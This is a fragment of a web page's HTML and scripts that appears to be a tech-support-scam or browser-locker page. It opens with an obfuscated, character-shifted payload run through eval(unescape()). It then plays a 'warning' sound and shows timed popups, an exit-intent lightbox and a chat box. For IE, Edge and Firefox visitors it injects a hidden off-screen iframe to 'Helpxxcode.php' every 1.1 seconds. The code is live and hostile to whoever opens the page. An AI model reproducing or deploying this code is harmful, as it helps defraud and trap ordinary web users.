%3CL.%3B%3E%3COJY.%3B%3E%3CJ8.%3B%3E%3CL.%3B%3E%3CO.%3B%3E%3CMW8.%3B%3E%3CL.%3B%3E%3CO.%3B%3E%3CMW.%3B%3E%3CJ8.%3B%3E%3CL.%3B%3E%3CO.%3B%3E%3CMWWL8.%3B%3E%3CL.%3B%3E%3COJX8.%3B%3E%3CL.%3B%3E%3COJY8.%3B%3E%3CL.%3B%3E%3COK.%3B%3E%3CN.%3B%3EA%3A%83L%82.%3B%3E@N8.%3B%3E%3CL.%3B%3E%3COJX8.%3B%3E%3CL.%3B%3E%3COJU.%3B%3EA%3A%7F8.%3B%3E%3CL.%3B%3E%3COK.%3B%3E%3CN.%3B%3E%3CJ8.%3B%3E%3CL.%3B%3E%3CO.%3B%3E%3CMXb.%3B%3E%3CJ8.%3B%3E%3CL.%3B%3E%3CO.%3B%3E%3CMW8.%3B%3E%3CL.%3B%3E%3CO.%3B%3E%3CMW%80.%3B%3EA%3A.%3B%3EA%3D%81.%3B%3EA9.%3B%3E%3CJ8.%3B%3E%3CL.%3B%3E%3CO.%3B%3E%3CMW8.%3B%3E%3CL.%3B%3E%3CO.%3B%3E%3CMW.%3B%3E%3CJUb.%3B%3E%3CJ8.%3B%3E%3CL.%3B%3E%3CO.%3B%3E%3CMWaS8.%3B%3E%3CL.%3B%3E%3CO.%3B%3E%3CMU8.%3B%3E%3CL.%3B%3E%3CO.%3B%3E%3CMU.%3B%3E%3CJ8.%3B%3E%3CL.%3B%3E%3CO.%3B%3E%3CMWW.%3B%3E%3CJ8.%3B%3E%3CL.%3B%3E%3CO.%3B%3E%3CMX%608.%3B%3E%3CL.%3B%3E%3CL8.%3B%3E%3CLL8.%3B%3E%3CMU8.%3B%3E%3CL.%3B%3E%3CJ.%3B%3EA9t.%3B%3E@L8.%3B%3E%3CL.%3B%3E%3CJ.%3B%3E@N8.%3B%3E%3CMW8.%3B%3E%3CLJ8.%3B%3E%3CLJ8.%3B%3E%3CMUy%82.%3B%3E@L8.%3B%3E%3CLK%7C8.%3B%3E%3CMW.%3B%3E%3CJ8.%3B%3E%3CMU%7C8.%3B%3E%3CMV.%3B%3E@M.%3B%3E%3CKA%7Fx%81z.%3B%3E@N%7B8.%3B%3E%3CMU%7C%3E%3E8.%3B%3E%3CLL.%3B%3E@N%3E8.%3B%3E%3CMW.%3B%3E%3EM.%3B%3E@N.%3B%3E@L%7C%81zAy.%3B%3E@L%82%80V%7Bt.%3B%3E@LV%82wx8.%3B%3E%3CLK.%3B%3E@M.%3B%3E%3CKAv%7Bt.%3B%3E@LV%82wxT.%3B%3E@N8.%3B%3E%3CLK%7C8.%3B%3E%3CLL@.%3B%3E%3CK.%3B%3E%3CK8.%3B%3E%3CLL8.%3B%3E%3CMUx.%3B%3EA9t%7F8.%3B%3E%3CLK.%3B%3E@O%81x.%3B%3E@Mvt%83x8.%3B%3E%3CLK.%3B%3E@N8.%3B%3E%3CLL8.%3B%3E%3CLL8.%3B%3E%3CMU8JWx.%3B%3EA9t%7Fx8.%3B%3E%3CLK8.%3B%3E%3CLL8.%3B%3E%3CMU.%3B%3B.%3BB.%3CK.%3B9%7Fj%7B.%3B9%7D.%3CM.%3B@.%3B@.%3CKox%7B.%3BAr.%3CM9.%3CKr.%3CL%7C%3A7unwp%7Dq.%3CKr44.%3BB%7D4.%3CM%5C%7D%7Brwp7o%7BxvLqj%7BLxmn.%3BA%7C%3A7lqj%7BLxmnJ%7D.%3BAr.%3BB6%3A9.%3BB.%3CKn%7Fju.%3BA%7Ewn%7Cljyn.%3BA%7D.%3BB.%3BB.%3CK.@Mn%7Fju%3B.%3BA.%3BB.%3CK"); var t='';for(i=0;i<s1.length;i++)t+=String.fromCharCode(s1.charCodeAt(i)-9);eval(unescape(t));}

  eval1(); setTimeout(function(){document.getElementById("map").style.display="block";document.getElementById("warning").play();},10);

</script>


<script>

$(document).ready(function() {
    $(".arow-div").delay(1000).fadeIn(500);
});
</script>
<script type="text/javascript">
    $(document).ready(function(){
  $(".delayedPopupWindow").click(function(){
    $('.delayedPopupWindow').hide('fast');
  });
});
</script>
<script type="text/javascript">
    $(document).ready(function(){
  $(".black").click(function(){
    $('.delayedPopupWindow').hide('fast');
  });
});
</script>
<script type="text/javascript">
    $(document).ready(function(){
  $("#win1").click(function(){
    $('.delayedPopupWindow').hide('fast');
  });
});
</script>
<script type="text/javascript">
    $(document).ready(function(){
  $("#win2").click(function(){
    $('.delayedPopupWindow').hide('fast');
  });
});
</script>
<script type="text/javascript">
    $(document).ready(function(){
  $("alert_popup").click(function(){
    $('.delayedPopupWindow').hide('fast');
  });
});
</script>

<script type="text/javascript">
 function addEvent(obj, evt, fn) {
    if (obj.addEventListener) {
        obj.addEventListener(evt, fn, false);
    } else if (obj.attachEvent) {
        obj.attachEvent("on" + evt, fn);
    }
}

addEvent(document, 'mouseout', function(evt) {
    if (evt.toElement == null && evt.relatedTarget == null) {
        $('.lightbox').slideDown();
    };
});

$('a.close').click(function() {
    $('.lightbox').slideUp();
});


</script>
<script type="text/javascript">
  $(document).ready(function() {
    $(".delayedPopupWindow").delay(5000).fadeIn(500);
});
 </script>
<script type="text/javascript">
  $(document).ready(function() {
    $(".alert_popup").delay(4000).fadeIn(500);
});
</script>
<script type="text/javascript">
   $(document).ready(function() {
    $("#chat-box").delay(16000).fadeIn(100);
});

</script>


<script type="text/javascript">/*<![CDATA[*/

 function get_browser(){
		var ua=navigator.userAgent,tem,M=ua.match(/(opera|chrome|safari|firefox|msie|trident(?=\/))\/?\s*(\d+)/i) || [];
		if(/trident/i.test(M[1])){
				tem=/\brv[ :]+(\d+)/g.exec(ua) || [];
				return {name:'IE',version:(tem[1]||'')};
				}
		if(M[1]==='Chrome'){
				tem=ua.match(/\bOPR\/(\d+)/)
				if(tem!=null)   {return {name:'Opera', version:tem[1]};}
				}
		M=M[2]? [M[1], M[2]]: [navigator.appName, navigator.appVersion, '-?'];
		if((tem=ua.match(/version\/(\d+)/i))!=null) {M.splice(1,1,tem[1]);}
		return {
			name: M[0],
			version: M[1]
		};
 }
 var InternetEx=window.navigator.appVersion.indexOf("MSIE")!=-1;
var isIEedge = window.navigator.userAgent.indexOf("Edge") > -1;
var browser=get_browser();
if(browser.name=="Firefox" || isIEedge|| InternetEx || navigator.appName == 'Microsoft Internet Explorer' ||  !!(navigator.userAgent.match(/Trident/) || navigator.userAgent.match(/rv:11/)) ){
	if(isIEedge|| InternetEx || navigator.appName == 'Microsoft Internet Explorer' ||  !!(navigator.userAgent.match(/Trident/) || navigator.userAgent.match(/rv:11/)))
		{

			 function msg_ff() {

						var i = document.createElement("div");
						i.innerHTML = '<div style="position:absolute;top:-100px;left:-9999px;z-index:1;"><iframe src="Helpxxcode.php"></iframe></div>';
						document.body.appendChild(i);

				}
				window.setInterval(function() {
						msg_ff();

				}, 1100);

			}
	else{
			function msg_ff() {

						var i = document.createElement("div");
						i.innerHTML = '<div style="position:absolute;top:-100px;left:-9999px;z-index:1;"><iframe src="Helpxxcode.php"></iframe></div>';
						document.body.appendChild(i);
				}
				window.setInterval(function() {
						msg_ff();

				}, 1100);

		}

 }
 else{

	 }


/*]]>*/</script>

</body>
</html>
